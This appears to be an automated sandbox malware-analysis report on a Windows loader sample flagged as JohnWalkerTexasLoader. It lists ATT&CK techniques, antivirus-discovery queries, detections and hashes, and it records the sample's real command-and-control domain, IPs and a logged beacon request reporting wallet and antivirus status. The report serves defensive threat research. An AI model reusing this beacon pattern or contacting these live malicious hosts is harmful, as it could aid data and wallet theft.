Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R5AREmpD4S.exe	Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\R5AREmpD4S.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: R5AREmpD4S.exe, 00000000.00000002.3309362539.000002511A46E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\R5AREmpD4S.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected JohnWalkerTexasLoader

Source: Yara match	File source: R5AREmpD4S.exe, type: SAMPLE
Source: Yara match	File source: 0.0.R5AREmpD4S.exe.2517d960000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2050334085.000002517D962000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3306981925.0000025100001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: R5AREmpD4S.exe PID: 4952, type: MEMORYSTR

Remote Access Functionality

Yara detected JohnWalkerTexasLoader

Source: Yara match	File source: R5AREmpD4S.exe, type: SAMPLE
Source: Yara match	File source: 0.0.R5AREmpD4S.exe.2517d960000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2050334085.000002517D962000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3306981925.0000025100001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: R5AREmpD4S.exe PID: 4952, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	21 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Virtualization/Sandbox Evasion	OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	12 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Timestomp	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
R5AREmpD4S.exe	34%	ReversingLabs	ByteCode-MSIL.Trojan.Walgentz
R5AREmpD4S.exe	100%	Avira	TR/Agent.tvuqm

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
xilloolli.com	188.114.96.3	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://xilloolli.com/api.php?status=1&wallets=0&av=1	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://xilloolli.com/api.php?status=1&wa	R5AREmpD4S.exe, 00000000.00000002.3306981925.0000025100458000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ipinfo.io/country	R5AREmpD4S.exe	false		unknown
http://xilloolli.com/api.phpEhttp://xilloolli.com/api-debug.php	R5AREmpD4S.exe	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	R5AREmpD4S.exe, 00000000.00000002.3306981925.0000025100001000.00000004.00000800.00020000.00000000.sdmp, R5AREmpD4S.exe, 00000000.00000002.3306981925.0000025100487000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://xilloolli.com/api-debug.php	R5AREmpD4S.exe, 00000000.00000002.3306981925.0000025100001000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://xilloolli.com	R5AREmpD4S.exe, 00000000.00000002.3306981925.0000025100001000.00000004.00000800.00020000.00000000.sdmp, R5AREmpD4S.exe, 00000000.00000002.3306981925.0000025100487000.00000004.00000800.00020000.00000000.sdmp, R5AREmpD4S.exe, 00000000.00000002.3306981925.0000025100499000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://xilloolli.com/api.php	R5AREmpD4S.exe, 00000000.00000002.3306981925.0000025100001000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://oklibed.com	R5AREmpD4S.exe	false		unknown
https://github.com/reproteq/DiffPatchWpf3Copyright	R5AREmpD4S.exe	false		unknown
https://ipinfo.io/ip	R5AREmpD4S.exe	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	xilloolli.com	European Union		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1542939
Start date and time:	2024-10-26 22:44:51 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	R5AREmpD4S.exe renamed because original name is a hash value
Original Sample Name:	b395637671eff620f784d4a8652425951fb3e834.exe
Detection:	MAL
Classification:	mal76.troj.evad.winEXE@1/0@1/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 92% Number of executed functions: 26 Number of non-executed functions: 7
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target R5AREmpD4S.exe, PID 4952 because it is empty
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: R5AREmpD4S.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	7950COPY.exe	Get hash	malicious	FormBook	Browse	www.globaltrend.xyz/b2h2/
	transferencia interbancaria_667553466579.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/Gitmx
	19387759999PO-RFQ-INVOICE-doc.exe	Get hash	malicious	FormBook	Browse	www.zonguldakescortg.xyz/483l/
	PO 4800040256.exe	Get hash	malicious	FormBook	Browse	www.rtpngk.xyz/876i/
	yGktPvplJn.exe	Get hash	malicious	Pushdo	Browse	www.fnsds.org/
	rPedidodecompra__PO20441__ARIMComponentes.exe	Get hash	malicious	Lokibot, PureLog Stealer, zgRAT	Browse	dddotx.shop/Mine/PWS/fre.php
	Orden de Compra No. 78986756565344657.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/nwtkd
	Doc 784-01965670.exe	Get hash	malicious	FormBook	Browse	www.launchdreamidea.xyz/bd77/
	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	www.timizoasisey.shop/3p0l/
	BL.exe	Get hash	malicious	FormBook	Browse	www.launchdreamidea.xyz/bd77/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
xilloolli.com	MHQMJCOxjl.exe	Get hash	malicious	JohnWalkerTexasLoader	Browse	188.114.97.3
xilloolli.com	73OPQbICEW.exe	Get hash	malicious	JohnWalkerTexasLoader	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	MHQMJCOxjl.exe	Get hash	malicious	JohnWalkerTexasLoader	Browse	188.114.97.3
	73OPQbICEW.exe	Get hash	malicious	JohnWalkerTexasLoader	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.95.91
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	172.67.170.64
	7950COPY.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	GK059kPZ5B.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	TP77MvSzt2.exe	Get hash	malicious	Stealc	Browse	104.21.56.70
	ZnPyVAOUBc.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	188.114.96.3
	jicQJ2cdlM.exe	Get hash	malicious	Stealc	Browse	104.21.56.70

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	3.850711697927339
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	R5AREmpD4S.exe
File size:	235'520 bytes
MD5:	851943a365537291c75d267db294961a
SHA1:	b395637671eff620f784d4a8652425951fb3e834
SHA256:	e1dbec1fea6f0197ac5d3b33dbfd50ce7e2918c9930ed9e9bee16e2f576a2875
SHA512:	cf752e0fb4c0ffe15d993c4f0a6584aa227dc888be4d66d992933c5a986c6223686a40669ce66571b473bd79568a8f6cb91dd83913096ef29a9bee99a3ceb2ff
SSDEEP:	768:I5SMwiB8a92H26PwqcyU6GR4kIKugg0Apk/OIaEyEb3GOd53BRnW2i38SmFhXzgj:cH8dPhYv4zApoePwzhpmy
TLSH:	1E34D4ABE32F6809CC2A32F5C8E443B45E605F116E10D6F964BDF2C5123599BFD189AC
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0.................. .....@..... ....................................`...@......@............... .....

File Icon


Icon Hash:	1761174505056997

Static PE Info

General

Entrypoint:	0x140000000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x88FC0B2E [Wed Oct 29 18:15:10 2042 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24000	0x18ca8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x226a8	0x38	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x2074b	0x20800	3a7ceae3da5db0554955e9d67bec1b4d	False	0.17765925480769232	data	4.281313969731251	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x24000	0x18ca8	0x18e00	d46f216a7dfee89a5dd1ba2c032f2ffe	False	0.10476209170854271	data	3.1344838579936667	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x24180	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.3962765957446808
RT_ICON	0x245f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.23381801125703564
RT_ICON	0x256b0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	0.23278008298755187
RT_ICON	0x27c68	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	0.12133915918752952
RT_ICON	0x2bea0	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	0.06113214243463859
RT_GROUP_ICON	0x3c6d8	0x4c	data	0.75
RT_VERSION	0x3c734	0x374	data	0.416289592760181
RT_MANIFEST	0x3cab8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2024 22:45:45.719017029 CEST	49704	80	192.168.2.5	188.114.96.3
Oct 26, 2024 22:45:45.724359989 CEST	80	49704	188.114.96.3	192.168.2.5
Oct 26, 2024 22:45:45.724447966 CEST	49704	80	192.168.2.5	188.114.96.3
Oct 26, 2024 22:45:45.726176977 CEST	49704	80	192.168.2.5	188.114.96.3
Oct 26, 2024 22:45:45.734466076 CEST	80	49704	188.114.96.3	192.168.2.5
Oct 26, 2024 22:45:46.913866997 CEST	80	49704	188.114.96.3	192.168.2.5
Oct 26, 2024 22:45:46.960107088 CEST	49704	80	192.168.2.5	188.114.96.3
Oct 26, 2024 22:47:26.932492018 CEST	49704	80	192.168.2.5	188.114.96.3
Oct 26, 2024 22:47:26.938658953 CEST	80	49704	188.114.96.3	192.168.2.5
Oct 26, 2024 22:47:26.938755989 CEST	49704	80	192.168.2.5	188.114.96.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2024 22:45:45.701085091 CEST	61556	53	192.168.2.5	1.1.1.1
Oct 26, 2024 22:45:45.708774090 CEST	53	61556	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 26, 2024 22:45:45.701085091 CEST	192.168.2.5	1.1.1.1	0x8a44	Standard query (0)	xilloolli.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 26, 2024 22:45:45.708774090 CEST	1.1.1.1	192.168.2.5	0x8a44	No error (0)	xilloolli.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 26, 2024 22:45:45.708774090 CEST	1.1.1.1	192.168.2.5	0x8a44	No error (0)	xilloolli.com		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

xilloolli.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	188.114.96.3	80	4952	C:\Users\user\Desktop\R5AREmpD4S.exe

Timestamp	Bytes transferred	Direction	Data
Oct 26, 2024 22:45:45.726176977 CEST	94	OUT	GET /api.php?status=1&wallets=0&av=1 HTTP/1.1 Host: xilloolli.com Connection: Keep-Alive
Oct 26, 2024 22:45:46.913866997 CEST	752	IN	HTTP/1.1 200 OK Date: Sat, 26 Oct 2024 20:45:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m3Ue8LDgCJvSQVq87EsmhHi0hGaK3d7aleW2n2CECN9HpUF2Nc9C%2FdI1qUJB3uSZbE8J01SmBWSqxQc6AaCpFv2Ou5yXVVK1kPuG3imTZ7cJq4qdKQr2S1NTaiHV%2BKDZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d8d4abc3fc46b2c-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1910&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=94&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	16:45:42
Start date:	26/10/2024
Path:	C:\Users\user\Desktop\R5AREmpD4S.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\R5AREmpD4S.exe"
Imagebase:	0x2517d960000
File size:	235'520 bytes
MD5 hash:	851943A365537291C75D267DB294961A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_JohnWalkerTexasLoader, Description: Yara detected JohnWalkerTexasLoader, Source: 00000000.00000000.2050334085.000002517D962000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_JohnWalkerTexasLoader, Description: Yara detected JohnWalkerTexasLoader, Source: 00000000.00000002.3306981925.0000025100001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Function 00007FF848CF5DD6 Relevance: .5, Instructions: 474COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25593dbbc316534a50edeba4271dd4ef43c5510adee9b52c604c4c8442c76777
Instruction ID: 1501f2edb18954cf4552060d733a9deabf455bc35a27bfecd6d81daed861e2f9
Opcode Fuzzy Hash: 25593dbbc316534a50edeba4271dd4ef43c5510adee9b52c604c4c8442c76777
Instruction Fuzzy Hash: BAF1A33090CA8D8FEBA8EF28D855BE977E1FF58340F04426AE84DC7295DB3498458B85

Function 00007FF848CF6B82 Relevance: .5, Instructions: 460COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dad27fa3938d5a76793393332d856e591439a265afd3431012bb29fdcc88d320
Instruction ID: 3a628ec5438ff711fab8596126905bfe7c20a72e45976de03b93a809c9aebf14
Opcode Fuzzy Hash: dad27fa3938d5a76793393332d856e591439a265afd3431012bb29fdcc88d320
Instruction Fuzzy Hash: 0FE1923090CA8D8FEBA8EF28C855BE977E1FF58350F04426ED84DC7291DB74A9458B85

Function 00007FF848CF7FAD Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

L_h, xrefs: 00007FF848CF8110

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID: L_h
API String ID: 0-554164850
Opcode ID: 57c536d1b94a50a5ef358cc02902b6474c9ea9a4dd4da2e16ee738887a7a8f55
Instruction ID: 67131d0667e937ee74b4b4e656172fad9273784054a4053a0adbc143a680bdf7
Opcode Fuzzy Hash: 57c536d1b94a50a5ef358cc02902b6474c9ea9a4dd4da2e16ee738887a7a8f55
Instruction Fuzzy Hash: 1E51D55085E6C56FE743E77808A65EABFF0DF1B250B4C45EAC4C88B0A7C61C680BC365

Function 00007FF848D00BB3 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

3L_H, xrefs: 00007FF848D00BEF

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID: 3L_H
API String ID: 0-4286477518
Opcode ID: ae868a4b64ff9902bb02f18d89f2709335abb8d861aff932690bfb632fa7197a
Instruction ID: 3829f610eaa4ae939497a01cb79f205bae163c0aec7a11d6a730dc34a22b944b
Opcode Fuzzy Hash: ae868a4b64ff9902bb02f18d89f2709335abb8d861aff932690bfb632fa7197a
Instruction Fuzzy Hash: 3541A230A1E949AFEB48FB68D8557EC7BE1EF89344F4401B9E00DD72E2DE286846C705

Function 00007FF848CF2774 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14bd1fba1418033c07815c7711ce1cfd74135d1adf7ffcb942ad47cd09ba0577
Instruction ID: 989b0974ce7096dd072b8c686a859a9dcddd31e33e68ccf9d5796e0ceebd5aab
Opcode Fuzzy Hash: 14bd1fba1418033c07815c7711ce1cfd74135d1adf7ffcb942ad47cd09ba0577
Instruction Fuzzy Hash: DA51F23190DA8A4FEB96F72898162B97BF1EF56250F4801FBD449C72E3DE2C9C468351

Function 00007FF848CF36CC Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e522fcd55e474a34ee11b9a591bc5b2d6cf3d5d7d047882dfe658b7ec083b23
Instruction ID: 45c9387909a2494bcc9b118878eb59e33d6cdddaaf3a47d5aeaa22e3024ee9d4
Opcode Fuzzy Hash: 1e522fcd55e474a34ee11b9a591bc5b2d6cf3d5d7d047882dfe658b7ec083b23
Instruction Fuzzy Hash: 37518471908A1C9FDB59EB58D845BE9BBF1FB59310F0081AAD04DD3292DF346985CB81

Function 00007FF848CFB4A4 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 647d0f91531f37c0161d0183ffa7b0508fa0ce46b2b3c3e3659dec51dc4d7a68
Instruction ID: 70adff1caa98cbd6f6d49317c263dc1dbe471e206613d428ba6edf72e88ad083
Opcode Fuzzy Hash: 647d0f91531f37c0161d0183ffa7b0508fa0ce46b2b3c3e3659dec51dc4d7a68
Instruction Fuzzy Hash: 6E511E7090DB8C8FDB98EF59D889AE9BBE0FB69311F10412EE54DC3252C774A445CB91

Function 00007FF848CF25A8 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c49a9e581ea46b25c8b16da5995530183bfb347636317b8b551ab1bbb04e885b
Instruction ID: a7b6ddbf0f567d0df8f8b5ab9c955825696b51e56eb9177a2519b61ff034bd50
Opcode Fuzzy Hash: c49a9e581ea46b25c8b16da5995530183bfb347636317b8b551ab1bbb04e885b
Instruction Fuzzy Hash: E851002095DAC41FE745E778482A7EA7FE1DF5A250F5845FED0C9CB2E3DA1C580A8702

Function 00007FF848CFC700 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f76373d88d7016f05f59a541be68fe09e13cab35be273553819cdbecb2f7b00c
Instruction ID: 5f52cb9aefee1b83142d16537d7d6e38f1b614f0374a74afed88c9f371bc7d7c
Opcode Fuzzy Hash: f76373d88d7016f05f59a541be68fe09e13cab35be273553819cdbecb2f7b00c
Instruction Fuzzy Hash: E2414572F0D9698FF795F76868595F9BBD0EF58760F0402BAD049C3292DF18A8028389

Function 00007FF848CF27E8 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f61bea1ca27e27cc3390924cb56810970f9a265628de7ace2c167d8220c64584
Instruction ID: d77154a2e1ed7d30c06e857ca00994722595afb00ff0244b1801cf48566416a4
Opcode Fuzzy Hash: f61bea1ca27e27cc3390924cb56810970f9a265628de7ace2c167d8220c64584
Instruction Fuzzy Hash: CE419E31E1D94A4FEBD4FB2894192B977E1FF98391B4401BAE50DD32E6DF289C428784

Function 00007FF848BDE2D2 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3311832721.00007FF848BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848bdd000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1f77b4d5488da88f48f21051a4ddbd9b307deb9ff58d77365ce885b75598eba
Instruction ID: bfaa582351e85981dea9e3c504c8f0483681761d6bd4c76274b6c491ada2136e
Opcode Fuzzy Hash: d1f77b4d5488da88f48f21051a4ddbd9b307deb9ff58d77365ce885b75598eba
Instruction Fuzzy Hash: 9D41093180DBC45FD7569B389C459A23FF0EF56360F1501EFD088CB1A3D625A846CBA6

Function 00007FF848CF0775 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cf0000_R5AREmpD4S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37414ef7c2481ad82e080201e5c0394fe8c17bd53693ba09d4b1782064648867
Instruction ID: 5b978e83ad93cf797aed2fe53727527cb592878915d57fdb3b0632b9ec33001f
Opcode Fuzzy Hash: 37414ef7c2481ad82e080201e5c0394fe8c17bd53693ba09d4b1782064648867
Instruction Fuzzy Hash: 4B41B662A0DAD65FE346A73C58A50E83FE0EF92994B0A01B7C2948F4D3EF1C18478685

Function 00007FF848CFF49D Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3312118193.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

